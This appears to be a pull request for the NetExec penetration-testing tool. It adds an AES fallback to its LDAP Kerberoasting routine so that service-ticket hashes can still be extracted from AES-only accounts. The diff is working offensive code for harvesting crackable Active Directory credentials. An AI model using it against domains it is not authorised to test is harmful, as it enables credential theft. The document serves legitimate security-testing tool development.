### PR TITLE
Fix Kerberoasting against AES-only

### DIFF
--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -973,9 +973,9 @@ class ldap(connection):
                     with open(self.args.asreproast, "a+") as hash_asreproast:
                         hash_asreproast.write(f"{hash_TGT}\n")
 
-    def _kerberoast_aes_fallback(self, err, current_tgt):
+    def _kerberoast_aes_fallback(self, e, current_tgt):
         """Obtain (and cache) an AES TGT to retry kerberoasting when an AES-only account rejects the RC4 ticket."""
-        if err.getErrorCode() != constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
+        if not isinstance(e, KerberosError) or e.getErrorCode() != constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
             return None
 
         cached = getattr(self, "_kerberoast_aes_tgt", None)
@@ -1078,10 +1078,10 @@ class ldap(connection):
                                 TGT["cipher"],
                                 TGT["sessionKey"],
                             )
-                        except KerberosError as ke:
+                        except Exception as e:
                             # RC4 service ticket rejected by an AES-only account (KDC_ERR_ETYPE_NOSUPP).
                             # Retry once with an AES TGT, mirroring the asreproast fallback behavior.
-                            aes_tgt = self._kerberoast_aes_fallback(ke, TGT)
+                            aes_tgt = self._kerberoast_aes_fallback(e, TGT)
                             if aes_tgt is None:
                                 raise
                             TGT = aes_tgt

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -1061,11 +1061,7 @@ class ldap(connection):
                     continue
 
             try:
-                if getattr(self, "_kerberoast_aes_tgt", None) is not None:
-                    # A previous account rejected RC4 (AES-only domain/account); reuse the AES TGT for the rest.
-                    TGT = self._kerberoast_aes_tgt
-                else:
-                    TGT = KerberosAttacks(self).get_tgt_kerberoasting(self.use_kcache)
+                TGT = KerberosAttacks(self).get_tgt_kerberoasting(self.use_kcache)
                 self.logger.debug(f"TGT: {TGT}")
                 if TGT:
                     try:

--- a/nxc/protocols/ldap.py
+++ b/nxc/protocols/ldap.py
@@ -28,7 +28,7 @@ from impacket.dcerpc.v5.samr import (
 )
 from impacket.krb5 import constants
 from impacket.krb5.crypto import generate_kerberos_keys
-from impacket.krb5.kerberosv5 import getKerberosTGS, SessionKeyDecryptionError
+from impacket.krb5.kerberosv5 import getKerberosTGS, SessionKeyDecryptionError, KerberosError
 from impacket.krb5.ccache import CCache
 from impacket.krb5.types import Principal, KerberosException
 from impacket.ldap import ldap as ldap_impacket
@@ -973,6 +973,24 @@ class ldap(connection):
                     with open(self.args.asreproast, "a+") as hash_asreproast:
                         hash_asreproast.write(f"{hash_TGT}\n")
 
+    def _kerberoast_aes_fallback(self, err, current_tgt):
+        """Obtain (and cache) an AES TGT to retry kerberoasting when an AES-only account rejects the RC4 ticket."""
+        if err.getErrorCode() != constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
+            return None
+
+        cached = getattr(self, "_kerberoast_aes_tgt", None)
+        if cached is not None:
+            # Already using the AES TGT and it still failed: nothing more to try for this account.
+            return None if current_tgt is cached else cached
+
+        if not self.password and not self.aesKey:
+            self.logger.fail("Target rejects RC4 (AES-only) and the current auth cannot request an AES TGT. Use password or --aesKey auth to kerberoast this account.")
+            return None
+
+        self.logger.info("Target rejects RC4 (AES-only); retrying kerberoasting with an AES TGT")
+        self._kerberoast_aes_tgt = KerberosAttacks(self).get_tgt_kerberoasting(self.use_kcache, force_aes=True)
+        return self._kerberoast_aes_tgt
+
     def kerberoasting(self):
         if self.args.no_preauth_targets:
             self.roast_no_preauth()
@@ -1043,7 +1061,11 @@ class ldap(connection):
                     continue
 
             try:
-                TGT = KerberosAttacks(self).get_tgt_kerberoasting(self.use_kcache)
+                if getattr(self, "_kerberoast_aes_tgt", None) is not None:
+                    # A previous account rejected RC4 (AES-only domain/account); reuse the AES TGT for the rest.
+                    TGT = self._kerberoast_aes_tgt
+                else:
+                    TGT = KerberosAttacks(self).get_tgt_kerberoasting(self.use_kcache)
                 self.logger.debug(f"TGT: {TGT}")
                 if TGT:
                     try:
@@ -1051,14 +1073,30 @@ class ldap(connection):
                         principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value
                         principalName.components = [f"{self.targetDomain}\\{user['sAMAccountName']}"]
 
-                        tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(
-                            principalName,
-                            self.domain,
-                            self.kdcHost,
-                            TGT["KDC_REP"],
-                            TGT["cipher"],
-                            TGT["sessionKey"],
-                        )
+                        try:
+                            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(
+                                principalName,
+                                self.domain,
+                                self.kdcHost,
+                                TGT["KDC_REP"],
+                                TGT["cipher"],
+                                TGT["sessionKey"],
+                            )
+                        except KerberosError as ke:
+                            # RC4 service ticket rejected by an AES-only account (KDC_ERR_ETYPE_NOSUPP).
+                            # Retry once with an AES TGT, mirroring the asreproast fallback behavior.
+                            aes_tgt = self._kerberoast_aes_fallback(ke, TGT)
+                            if aes_tgt is None:
+                                raise
+                            TGT = aes_tgt
+                            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(
+                                principalName,
+                                self.domain,
+                                self.kdcHost,
+                                TGT["KDC_REP"],
+                                TGT["cipher"],
+                                TGT["sessionKey"],
+                            )
                         out = KerberosAttacks(self).output_tgs(
                             tgs,
                             oldSessionKey,

--- a/nxc/protocols/ldap/kerberos.py
+++ b/nxc/protocols/ldap/kerberos.py
@@ -123,7 +123,7 @@ class KerberosAttacks:
             fd.write(entry + "\n")
         return entry
 
-    def get_tgt_kerberoasting(self, kcache=None):
+    def get_tgt_kerberoasting(self, kcache=None, force_aes=False):
         if kcache:
             if getenv("KRB5CCNAME"):
                 self.logger.debug("KRB5CCNAME environment variable exists, attempting to use that...")
@@ -152,7 +152,9 @@ class KerberosAttacks:
         # password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the
         # cleartext password.
         # If no clear text password is provided, we just go with the defaults.
-        if self.password != "" and (self.lmhash == "" and self.nthash == ""):
+        # When force_aes is set (AES-only target rejected RC4), we skip the RC4 conversion so the KDC
+        # negotiates an AES TGT from the cleartext password / aesKey instead.
+        if self.password != "" and (self.lmhash == "" and self.nthash == "") and not force_aes:
             try:
                 tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(
                     user_name,


### PR DESCRIPTION
## Description

This PR adds an automatic fallback: on `KDC_ERR_ETYPE_NOSUPP` from `getKerberosTGS`.

On real life test, when kerberoasting over LDAP, nxc forces an RC4. Against AES-only service accounts / RC4-disabled domains the KDC rejects this with `KDC_ERR_ETYPE_NOSUPP` and no hash is returned — mirroring Impacket GetUserSPNs.py, which only works there with `-no-rc4` flag.

## Type of change

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [ ] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)
- [ ] This PR was created with the assistance of AI (list what type of assistance, tool(s)/model(s) in the description)

## Setup guide for the review
Against real life test (DC - Server 2022). nxc returns `Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)`. Target user's `msDS-SupportedEncryptionTypes 0`

## Screenshots (if appropriate):

Before Fix:
<img width="3292" height="222" alt="image" src="https://github.com/user-attachments/assets/3c42155b-8314-4ac9-adee-c69ca43ab1d8" />

Impacket GetUserSPNs.py results while not using `-no-rc4`
<img width="3088" height="1294" alt="image" src="https://github.com/user-attachments/assets/d9f34bd1-23ca-4822-aa05-ddd67117eda5" />

Impacket GetUserSPNs.py results while using `-no-rc4`

<img width="3316" height="1112" alt="image" src="https://github.com/user-attachments/assets/1c23ef25-577a-4197-b8cb-4d2cbc258a8f" />

After Fix:
<img width="3308" height="864" alt="image" src="https://github.com/user-attachments/assets/6f1f1b97-703c-4453-95e7-5f7fc91fcae9" />


## Checklist:

- [x] I have ran Ruff against my changes (poetry: `poetry run ruff check .`, use `--fix` to automatically fix what it can)
- [ ] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
- [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [ ] I have linked relevant sources that describes the added technique (blog posts, documentation, etc)
- [ ] I have performed a self-review of my own code (_not_ an AI review)
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)
